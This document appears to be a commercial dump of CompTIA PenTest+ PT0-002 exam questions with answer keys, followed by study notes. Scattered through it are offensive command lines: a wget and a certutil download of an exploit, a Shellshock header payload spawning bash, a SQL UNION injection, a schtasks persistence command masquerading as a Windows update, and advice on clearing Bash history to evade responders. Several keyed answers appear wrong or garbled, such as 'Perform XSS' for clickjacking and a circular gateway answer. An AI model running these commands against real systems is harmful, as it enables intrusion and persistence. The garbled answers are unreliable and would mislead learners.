CompTIA PenTest+ Exam PT0-002 Overview

Questions and Answers

Which of the following situations would MOST likely warrant revalidation of a previous security assessment? (Select all that apply)

• When most of the vulnerabilities have been remediated (correct)
• When an organization updates its network firewall configurations
• After detection of a breach
• After a merger or an acquisition

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

• Building a scheduled task for execution
• Redirecting output from a file to a remote system
• Creating a new process on all domain systems
• Setting up a reverse shell from a remote system
• Executing a file on the remote system (correct)
• Adding an additional IP address on the compromised system
• Mapping a share to a remote system (correct)

Which of the following explains the reason why the command failed?

• The command requires the -port 135 option
• PowerShell requires administrative privilege
• An account for RDP does not exist on the server
• The tester input the incorrect IP address (correct)

Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

Active scanning (B)

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

Dump the user address book on the device (D)

Which of the following would a company's hunt team be MOST interested in seeing in a final report?

Attack TTPs (B)

Which of the following should the penetration tester consider BEFORE running a scan?

The type of scan (A)

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

Metasploit (D)

Which of the following is the tester performing?

Scanning a network for specific open ports (D)

Which of the following would be the BEST command to use for further progress into the targeted network?

nc 127.0.0.1 5555 (D)

A penetration tester wants to force nearby wireless stations to connect to a malicious AP. Which step should the tester take NEXT?

Send deauthentication frames to the stations. (A)

Which of the following commands will determine if a server is running an approved version of Linux and patched version of Apache?

nmap -A -T4 -p80 192.168.1.20 (C)

Which of the following expressions in Python increase a variable val by one? (Choose two.)

val=(val+1) (A), val+=1 (D)

Which recommendation would BEST address the situation where 80% of employees clicked on a phishing email?

Implement a recurring cybersecurity awareness education program for all users. (A)

Which tool would BEST test the effectiveness of wireless IDS solutions?

Aircrack-ng (A)

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Injection flaws (A), Cross-site scripting (F)

Which of the following was captured by the testing team using the Responder tool?

User hashes sent over SMB (B)

Running a vulnerability scanner on a hybrid network segment may cause which risk?

May cause unintended failures in control systems. (B)

Which tool should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports discovered by Nmap?

OpenVAS (A)

Which method is BEST to obtain FTP credentials by conducting an on-path attack?

Capture traffic using Wireshark. (C)

What is the NEXT step in the engagement after reviewing initial findings with the client?

Acceptance by the client and sign-off on the final report. (C)

Which BEST describes a compliance-based penetration test?

Determining the efficacy of a specific set of security standards. (D)

Which of the following tools can help evaluate the security awareness level of the company’s employees?

SET (A)

Which is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

The existence of default passwords (A)

What command could be used to download a file named exploit to a target machine for execution?

wget 10.10.51.50:9891/exploit

Which character combination should be used on the first line of a shell script to specify the Bash interpreter?

#!/bin/bash

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised?

To remove tools from the server (A)

Which of the following is the MOST likely reason for the lack of output when browsing the URL http://172.16.100.10:3000/profile?

This URI returned a server error. (D)

Which of the following is the penetration tester trying to accomplish by running WPScan and SQLmap?

Limit invasiveness based on scope. (C)

In which of the following places should the penetration tester look FIRST for the employees’ phone numbers?

Web archive (C)

Which of the following is the BEST way to ensure a single identified vulnerability is a true positive?

Perform a manual test on the server. (B)

Which of the following is MOST vulnerable to a brute-force attack?

WPS (A)

What should the tester do AFTER delivering the final report?

Remove the tester-created credentials. (B)

Which of the following describes the scope of the assessment when a penetration tester only has publicly available information about the target company?

Unknown environment testing (D)

Which line numbers from the script MOST likely contributed to triggering a probable port scan alert in the organization's IDS?

Line 08 (B)

Which of the following should be included in the Rules of Engagement (ROE)?

Testing restrictions (B)

Which of the following is most important for the penetration tester to define FIRST when conducting an assessment?

Establish the threshold of risk to escalate to the client immediately. (D)

Which tool or technique would BEST support additional reconnaissance in a physical penetration test?

Recon-ng (A)

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

ProxyChains (D)

Which tool should the tester utilize to open and read the .pcap file to look for credentials?

Wireshark (C)

Which Nmap scan syntax would BEST allow a penetration tester to discover live hosts on a subnet quickly?

nmap -sn 10.12.1.0/24 (A)

Which of the following tools would be MOST useful in collecting vendor and security-relevant information for IoT devices?

Shodan (C)

What is the order of steps to validate whether the Java application uses encryption over sockets?

Start a packet capture with Wireshark and then run the application. (D)

Why is it important to express the optimal time of day for test execution in a penetration test?

Business and network operations may be impacted. (C)

Which of the following should the company avoid when engaging with a penetration-testing company?

Sending many web requests per second to test DDoS protection. (B)

Which of the following actions should the penetration tester be sure to remove from the system at the conclusion of a penetration test?

Spawned shells (C), Created user accounts (D)

Which vulnerability is the security consultant MOST likely to identify by performing fuzzing on a software binary?

Buffer overflows (A)

Which influence technique is the penetration tester using MOST in the prepared phishing email?

Authority and urgency (C)

Which vulnerability has the penetration tester exploited by changing values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10?

Direct object reference (C)

Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

Input validation (C), Output encoding (E)

Which of the following should the penetration tester do NEXT after discovering a critical vulnerability being exploited?

Reach out to the primary point of contact (A)

Which of the following methods would BEST support validation of the possible findings for newly released CVEs?

Test with proof-of-concept code from an exploit database (A)

Which Nmap command will return vulnerable ports that might be interesting to a potential attacker?

nmap 192.168.1.1-5 -PS22-25,80 (D)

Which tool can a penetration tester utilize to help gauge what an attacker might see in the 64-bit Windows binaries?

OllyDbg (B)

Which commands should be used to enumerate all user accounts on an SMTP server?

VRFY and EXPN (B)

Which tool provides Python classes for interacting with network protocols?

Impacket (B)

Which OS or filesystem mechanism is MOST likely to support executing a crafted binary via wmic.exe?

PowerShell modules (D)

What is the BEST recommendation to prevent unauthorized changes by employees in the payment system?

Enforce mandatory employee vacations (C)

Which Nmap scan is MOST likely to avoid detection by the client's IDS?

nmap -p0 -T0 -sS 192.168.1.10 (D)

What should a penetration tester do NEXT after identifying malware in an application?

Stop the assessment and inform the emergency contact. (D)

What is the tester trying to accomplish by running the command 'find /-user root -perm -4000 -print 2>/dev/null'?

Find files with the SUID bit set (C)

Which tools will help the tester prepare an attack on a PHP script in an internal repository?

Netcat and cURL (C)

What would MOST likely be included in the final report of a static application-security test for developers?

Code context for instances of unsafe type-casting operations (B)

Which approach would BEST support identifying a vulnerability allowing access to doors via a specialized TCP service?

Create a script in the Lua language and use it with NSE. (A)

What type of cloud attack involves exploiting a VM instance to trick users into giving away credentials?

Credential harvesting (A)

What is the MINIMUM frequency to complete a scan of a PCI DSS v3.2.1 compliant system?

Quarterly (C)

After security alarms are triggered during a penetration test, what should the company do NEXT?

Deconflict with the penetration tester. (B)

What would BEST support identifying CVEs on a Linux server with a running SSHD?

Run nmap with the -O, -p22, and -sC options set against the target (B)

Which Pacu module enables determining the level of access of an existing user in a cloud environment?

iam_enum_permissions (D)

What recommendation should be included in the report to address the inclusion of vulnerable third-party modules?

Add a dependency checker into the tool chain. (D)

Which vulnerability is exploited by accessing the cloud provider's metadata to get instance credentials?

Server-side request forgery (B)

What is one of the MOST important items to develop fully before beginning penetration testing with an enterprise organization?

Clarify the statement of work. (A)

Which action should a red-team tester take upon finding an artifact indicating prior compromise?

Halt the assessment and follow the reporting procedures as outlined in the contract. (D)

What objective is the tester attempting to achieve by running a network probe?

Determine active hosts on the network. (B)

What should a penetration tester consider FIRST when engaging in a cloud penetration test?

Whether the cloud service provider allows the penetration tester to test the environment. (B)

What is one of the most sophisticated forms of attack that exploits shared cache memory between VMs?

Cross-VM Cache Side Channel Attack (C)

What are the steps to remediate the highest vulnerability after reviewing a website?

Step 1 - Generate a Certificate Signing Request, Step 2 - Submit CSR to the CA, Step 3 - Install re-issued certificate on the server, Step 4 - Remove Certificate from Server.

Which remediation is appropriate for a DOM XSS attack?

Input Sanitization (D)

What is the command to run a port scan generating a detailed output?

nmap -sV -O --top-ports=100 192.168.2.2

Before starting a security assessment on a hot site, what must be ensured?

The client has signed the SOW (C)

What is the greatest risk when performing a penetration test against SCADA devices?

Devices may cause physical world effects (D)

Which document outlines the specific activities and deliverables for a penetration tester?

SOW (D)

What assumption is likely valid regarding PLCs connected to a company network?

PLCs will not act upon injected commands (A)

What should be acquired before starting the assessment if access was denied until Monday?

Emergency contacts (D)

To exploit service permissions on a Windows server, which command should be initiated?

certutil -urlcache -split -f http://... (D)

Which protocol provides in-transit confidentiality for emailing the final report?

S/MIME (C)

What recommendations should be added for a network device that has an intercepted login request?

Disable or upgrade SSH daemon (C)

Which OS is most likely to return a packet with a 128 TTL?

Windows (D)

Which technique would best allow a penetration tester to send traffic using double tagging?

Tag nesting (A)

What tool is best for exploring a WordPress site for vulnerabilities?

WPScan (B)

What actions does the given script perform?

Look for open ports (D)

Which device types are likely to have similar responses during a scan?

Public-facing web server (A), IoT/embedded device (D)

What type of attack is indicated by attempting to inject query parameters?

Parameter pollution (B)

What should be done next to protect the confidentiality of the client's information after an assessment?

Encrypt and store client information (B)

Which methods would help in retrieving email addresses without triggering cybersecurity tools?

Crawling the client's website (A), Scraping social media sites (B)

What command should a penetration tester run to clean up after an engagement?

rm -rf /tmp/apache (A)

What is a significant concern about using third-party open-source libraries?

The libraries may be vulnerable (B), Code is open to anyone (D)

Which tools are considered passive reconnaissance tools?

Wireshark (D)

What issue is most likely indicated by an ARP poisoning problem?

A poisoned ARP cache (B)

What does the OWASP Top 10 describe?

The most critical risks of web applications (C), The risks in order of importance (D)

What command was used to generate the active hosts list?

nmap -sn 192.168.0.1-254 (B)

Does the country where the cloud service is based have any impeding laws?

True (A)

What should a penetration tester do with a clickjacking vulnerability found on a login page?

Perform XSS (C)

Which two methods would be MOST helpful for information gathering in a penetration test?

Internet search engines (A), Shodan results (B)

What should a penetration tester do NEXT after discovering a web server has a backdoor?

Inform the customer immediately about the backdoor (B)

What are the MOST important items to include in the final report for a penetration test?

The vulnerability identifier (C), The network location of the vulnerable device (D)

What command is used to fetch HTTP headers in a web test?

curl -I -http2 https://www.comptia.org

What tool is most likely used after the unshadow command?

John the Ripper (C)

What type of account should a penetration tester use for authenticated scans?

Service (C)

What is the best action for a tester who finds a text file with usernames and passwords in cleartext?

Document the unprotected file repository as a finding in the penetration-testing report (C)

Who is the MOST effective person to validate results from a penetration test?

Team leader (D)

What methodology does the client use for the penetration test described?

PTES technical guidelines (A)

What likely happened if all 65,535 ports were filtered during an Nmap scan?

A firewall or IPS blocked the scan (B)

Which document could hold a penetration tester accountable for posting exploit information online?

NDA (B)

Which Nmap command will perform a scan including SNMP, NetBIOS, and DNS services?

nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan (D)

What type of denial-of-service attack could be used if ICMP is disabled on a network segment?

Fraggle (A)

What should be included in the remediation section of a penetration test report for technical staff?

A quick description of the vulnerability and a high-level control to fix it (D)

What code edit should a penetration tester make to determine the user context of a server exploit?

exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} (D)

Which framework provides a matrix of common tactics and techniques with recommended mitigations?

MITRE ATT&CK framework (C)

What should a penetration tester attack to gain control of the state in the HTTP protocol after a user is logged in?

Sessions and cookies (B)

Which tool is BEST to use for finding vulnerabilities on a database server?

SQLmap (B)

What command can be used to maintain access to a compromised Windows workstation?

schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe (B)

Which Shodan setting would allow scanning for Cisco devices requiring no authentication?

"cisco-ios" "no-password" (C)

What command can be used to further attack a website showing an SQL injection vulnerability?

1 UNION SELECT 1, DATABASE(),3-- (B)

What is a recommended remediation for a vulnerability found during a scan of critical servers?

Implement a patch management plan (B)

What concern best supports a software company's request for background investigations on a reverse-engineering team?

The reverse-engineering team may have a history of selling exploits to third parties (D)

What technique will likely have the highest success rate for accessing a client's financial system in eight business hours?

Performing spear phishing against employees by posing as senior management (B)

What is the BEST conclusion about a device if it reports being a gateway with in-band management services?

This device is most likely a gateway with in-band management services. (D)

Why would a client hold a lessons-learned meeting with the penetration-testing team?

To determine any processes that failed to meet expectations during the assessment (B)

What technique is BEST to gain confidential information if a company lacks shredders?

Dumpster diving (C)

Which attack type is MOST concerning for a company sharing physical resources in a cloud environment?

Cross-tenant attacks (A)

Study Notes

Exam Information

• Exam Code: PT0-002
• Exam Name: CompTIA PenTest+ Exam
• Version: 23.031
• Free updates available within 150 days of purchase
• Updates can be downloaded from the member center

Key Security Concepts

• XSS Attack Defense:

  • Implement Output encoding and Input validation to mitigate cross-site scripting (XSS) vulnerabilities.

• Handling Vulnerability Exploitation:

  • If an active exploitation is identified during testing, pause activities and immediately inform the client.

Penetration Testing Techniques

• To validate CVE findings in VoIP manager, using proof-of-concept code from exploit databases is optimal.
• Employ SYN scan (nmap -PS) to identify live vulnerable TCP ports during a network scan.

Tools and Commands

• Use Impacket for interacting with network protocols in Python during penetration testing.
• For Windows hosts, exploit wmic.exe to run binaries indirectly through PowerShell.
• SMTP user account enumeration can be performed using the commands VRFY and EXPN.

Risk Management and Recommendations

• Implement mandatory employee vacations to discover unauthorized activity in sensitive systems.
• Automate vulnerability validation through Nmap and Lua scripting for efficient assessment.

Compliance and Standards

• PCI DSS requires quarterly vulnerability scans for compliance.

Incident Response Actions

• Upon identifying malware on a tested application, inform emergency contacts immediately rather than attempting immediate removal.

Exploit Identification

• Utilize server-side request forgery (SSRF) to exploit cloud provider metadata for unauthorized access credentials.

Initial Engagement Procedures

• Clarify the statement of work fully prior to engagement in penetration testing activities to avoid misunderstandings.

Final Reporting Essentials

• Include the vulnerability identifier and network location of the vulnerable device in the final penetration test report.

Important Penetration Testing Strategies

• In cloud environments, it's critical to first ascertain permission from the service provider before testing.
• Clickjacking vulnerabilities require exploitation through XSS techniques for successful attacks.

Information Gathering

• Utilize internet search engines and Shodan results to gather initial information on the company's web presence for minimal disruption.### Penetration Testing Concepts
• Penetration testing (PenTest) involves simulating attacks to identify vulnerabilities and assess security measures in an organization's systems.
• Goals include understanding areas prone to attacks and providing recommendations for securing those assets.

Command Outputs and Tools Used

• curl -I -http2 https://www.comptia.org returns HTTP headers; expected output is typically HTTP status and other headers.
• unshadow command combines /etc/passwd and /etc/shadow files for username and password data, often utilized by John the Ripper for password cracking.
• Service accounts are advantageous for authenticated scans because they may have elevated privileges, enabling comprehensive assessments.

Vulnerability Discovery and Reporting

• Unprotected network file repositories can expose sensitive information; documenting such findings is critical.
• A penetration tester's findings should highlight both technical vulnerabilities and their implications on the business.

Validation and Methodologies

• The Team Leader is best positioned to validate results from a penetration test to ensure accuracy before presenting to the client.
• The PenTest methodology includes pre-engagement activities, reconnaissance, threat modeling, and reporting.

Testing Practices and Security Measures

• Command nmap -O -A -sS -p- [IP address] identifies open ports and may return filtered results due to firewall/IPS configurations.
• Non-disclosure agreements (NDAs) protect clients' sensitive information and can hold testers accountable for disclosing exploits publicly.
• When discovering a vulnerable service, crafting tests to escalate privileges, such as checking user contexts using specific commands, is crucial.

Best Practices and Recommendations

• To secure sensitive data, organizations should implement secure password management practices and robust configuration rules.
• During vulnerability assessments, if ICMP is disabled, alternative attack methods such as a Fraggle attack may be utilized.

Attack Techniques and Remediations

• Techniques like SQL injection and XSS vulnerabilities require specific countermeasures such as input validation and parameterized queries.
• Awareness of side-channel attacks, especially in cloud environments, is vital due to shared resources that can be exploited by attackers.

Simulation and Assessment Methods

• In practical simulations, testers may generate certificate signing requests and install new certificates to address vulnerabilities.
• Port scanning results identifying open ports can be utilized to strategize potential Null session attacks, highlighting the need for service restrictions.

Communication and Post-Assessment Actions

• Conducting lessons-learned meetings allows clients and teams to discuss findings, improving future testing methodologies.
• Effective communication with clients about vulnerabilities and how to remediate them strengthens overall security posture.

Physical Security Awareness

• Techniques such as dumpster diving can be leveraged to gather sensitive information if proper disposal methods are not implemented, emphasizing the importance of secure waste management.

Cloud Security Considerations

• Companies must remain vigilant about the risk of cross-VM vulnerabilities, which can lead to significant data breaches if not properly addressed.### Business Continuity Assessment
• Ensure a signed Statement of Work (SOW) before initiating any assessment to confirm contract boundaries and expectations.

Penetration Testing and SCADA Risks

• Penetrating SCADA systems poses safety risks due to potential physical world effects, such as gas line ruptures.

Penetration Tester Responsibilities

• SOW documents outline specific activities, deliverables, and schedules for penetration testing.

PLC Security Assumptions

• Controllers may not validate the origin of commands, increasing the risk of exploitation due to poor security measures.

Client Communication During Penetration Testing

• Establish proper emergency contacts with the client before starting the assessment to ensure swift communication when access issues arise.

Exploiting Misconfigured Permissions

• Use the command certutil -urlcache -split -f http://[...] to facilitate exploitation of Windows server misconfigurations.

Email Confidentiality Protocols

• S/MIME is effective for ensuring in-transit confidentiality of sensitive email content, including security assessment reports.

Network Device Recommendations

• Recommended actions include disabling HTTP configurations and creating an out-of-band network for management to secure network devices.

Operating System Identification

• A packet with a 128 TTL likely comes from a Windows operating system based on default settings.

VLAN Hopping Technique

• Double tagging, also known as tag nesting, is used to send traffic across VLANs by manipulating Ethernet frame tags.

WordPress Vulnerability Scanner

• WPScan is optimal for identifying vulnerabilities in WordPress sites by checking plugins against known vulnerabilities.

Port Scanning and Cleanup

• The command to search for open ports is crucial; cleanup actions must be taken after testing to avoid leaving traces.

OWASP Top 10 Security Risks

• The OWASP Top 10 outlines the most critical risks faced by web applications and is pivotal in guiding web security priorities.

TCP Packet Manipulation

• Scapy allows for detailed TCP header manipulation to understand how proprietary services respond to crafted packets.

Phishing Mitigation Strategies

• Implementing a recurring cybersecurity awareness program effectively addresses employee susceptibility to phishing attacks.

Ethical Guidelines for Penetration Testing

• Retaining critical vulnerabilities and failing to communicate them to the client is deemed unethical; transparency in reporting is essential.

Wireless IDS Effectiveness Testing

• Aircrack-ng is suitable for testing wireless intrusion detection systems, ensuring network security against unauthorized access.

Command Actions for Covering Tracks

• Clearing Bash history after gaining access aids in evading detection by incident response teams.

OWASP Top 10 Vulnerability Types

• Cross-site scripting and injection flaws are significant web application vulnerabilities outlined in the OWASP Top 10 2017 version.

Description

Prepare for the CompTIA PenTest+ Exam PT0-002 with this comprehensive overview. Stay updated with the latest product information and ensure your success with essential resources. This guide offers insights needed to ace the exam on your first attempt.